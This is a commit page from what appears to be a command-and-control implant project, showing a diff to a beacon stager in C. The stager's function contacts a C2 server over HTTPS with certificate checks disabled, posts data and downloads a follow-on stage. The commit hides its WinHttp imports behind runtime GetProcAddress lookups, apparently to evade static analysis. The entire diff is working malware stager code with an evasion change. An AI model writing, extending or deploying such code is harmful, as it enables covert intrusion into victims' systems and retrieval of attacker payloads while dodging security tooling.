Skip to content

Commit

Permalink
hide winhttp imports
Browse files Browse the repository at this point in the history
  • Loading branch information
brucewayne committed Jun 4, 2020
1 parent 3626703 commit cd89882
Show file tree
Hide file tree
Showing 2 changed files with 76 additions and 10 deletions.
28 changes: 18 additions & 10 deletions beacon/stager/callback.c
View file
Original file line number Diff line number Diff line change
@@ -1,8 +1,8 @@
#include <windows.h>
#include <winhttp.h>

// #include "base64.h"
#include "settings.h"
#include "imports.h"

#define _CALLBACK_URL L"/stage"
#define _POST_HEADER L"Content-Type: application/x-www-form-urlencoded\r\n"
Expand All @@ -26,28 +26,32 @@ CHAR* GetStageFromC2(DWORD* sSize)
SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;

// init the connection
hSession = WinHttpOpen((LPCWSTR)_CALLBACK_USER_AGENT, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
WinHttpOpen_ rWinHttpOpen = (WinHttpOpen_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpOpen");
hSession = rWinHttpOpen((LPCWSTR)_CALLBACK_USER_AGENT, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
if (!hSession)
{
return NULL;
}

// make the connection
hConnect = WinHttpConnect(hSession, (LPCWSTR)_C2_CALLBACK_ADDRESS, _C2_CALLBACK_PORT, 0);
WinHttpConnect_ rWinHttpConnect = (WinHttpConnect_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpConnect");
hConnect = rWinHttpConnect(hSession, (LPCWSTR)_C2_CALLBACK_ADDRESS, _C2_CALLBACK_PORT, 0);
if (!hConnect)
{
return NULL;
}

// setup our request
hRequest = WinHttpOpenRequest(hConnect, L"POST", _CALLBACK_URL, NULL, NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE | WINHTTP_FLAG_SECURE);
WinHttpOpenRequest_ rWinHttpOpenRequest = (WinHttpOpenRequest_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpOpenRequest");
hRequest = rWinHttpOpenRequest(hConnect, L"POST", _CALLBACK_URL, NULL, NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE | WINHTTP_FLAG_SECURE);
if (!hRequest)
{
return NULL;
}

// let us connect with bad ssl certs
if (!WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &Flags, sizeof(Flags)))
// let us connect with bad ssl certs
WinHttpSetOption_ rWinHttpSetOption = (WinHttpSetOption_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpSetOption");
if (!rWinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &Flags, sizeof(Flags)))
{
return NULL;
}
Expand All @@ -73,18 +77,21 @@ CHAR* GetStageFromC2(DWORD* sSize)
#endif

// make the request
bResults = WinHttpSendRequest(hRequest, _POST_HEADER, _HEADER_LEN, (LPVOID)payload, strlen(payload), strlen(payload), 0);
WinHttpSendRequest_ rWinHttpSendRequest = (WinHttpSendRequest_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpSendRequest");
bResults = rWinHttpSendRequest(hRequest, _POST_HEADER, _HEADER_LEN, (LPVOID)payload, strlen(payload), strlen(payload), 0);

if (bResults)
{
DEBUG("made callback");
bResults = WinHttpReceiveResponse(hRequest, NULL);
WinHttpReceiveResponse_ rWinHttpReceiveResponse = (WinHttpReceiveResponse_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpReceiveResponse");
bResults = rWinHttpReceiveResponse(hRequest, NULL);

do
{
// check how much available data there is
dwSize = 0;
if (!WinHttpQueryDataAvailable( hRequest, &dwSize))
WinHttpQueryDataAvailable_ rWinHttpQueryDataAvailable = (WinHttpQueryDataAvailable_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpQueryDataAvailable");
if (!rWinHttpQueryDataAvailable( hRequest, &dwSize))
{
DEBUG( "Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
break;
Expand All @@ -107,7 +114,8 @@ CHAR* GetStageFromC2(DWORD* sSize)
// read all the data
ZeroMemory(pszOutBuffer, dwSize + 1);

if (!WinHttpReadData( hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
WinHttpReadData_ rWinHttpReadData = (WinHttpReadData_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpReadData");
if (!rWinHttpReadData( hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
{
// been an error
break;
Expand Down
58 changes: 58 additions & 0 deletions beacon/stager/imports.h
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,58 @@
typedef HINTERNET (WINAPI * WinHttpOpen_) (
LPCWSTR pszAgentW,
DWORD dwAccessType,
LPCWSTR pszProxyW,
LPCWSTR pszProxyBypassW,
DWORD dwFlags
);

typedef HINTERNET (WINAPI * WinHttpConnect_) (
IN HINTERNET hSession,
IN LPCWSTR pswzServerName,
IN INTERNET_PORT nServerPort,
IN DWORD dwReserved
);

typedef HINTERNET (WINAPI * WinHttpOpenRequest_) (
IN HINTERNET hConnect,
IN LPCWSTR pwszVerb,
IN LPCWSTR pwszObjectName,
IN LPCWSTR pwszVersion,
IN LPCWSTR pwszReferrer,
IN LPCWSTR *ppwszAcceptTypes,
IN DWORD dwFlags
);

typedef BOOLAPI (WINAPI * WinHttpSetOption_) (
HINTERNET hInternet,
DWORD dwOption,
LPVOID lpBuffer,
DWORD dwBufferLength
);

typedef BOOLAPI (WINAPI * WinHttpSendRequest_) (
IN HINTERNET hRequest,
LPCWSTR lpszHeaders,
IN DWORD dwHeadersLength,
LPVOID lpOptional,
IN DWORD dwOptionalLength,
IN DWORD dwTotalLength,
IN DWORD_PTR dwContext
);

typedef BOOLAPI (WINAPI * WinHttpReceiveResponse_) (
IN HINTERNET hRequest,
IN LPVOID lpReserved
);

typedef BOOLAPI (WINAPI * WinHttpQueryDataAvailable_) (
IN HINTERNET hRequest,
LPDWORD lpdwNumberOfBytesAvailable
);

typedef BOOLAPI (WINAPI * WinHttpReadData_) (
IN HINTERNET hRequest,
LPVOID lpBuffer,
IN DWORD dwNumberOfBytesToRead,
OUT LPDWORD lpdwNumberOfBytesRead
);

0 comments on commit cd89882

Please sign in to comment.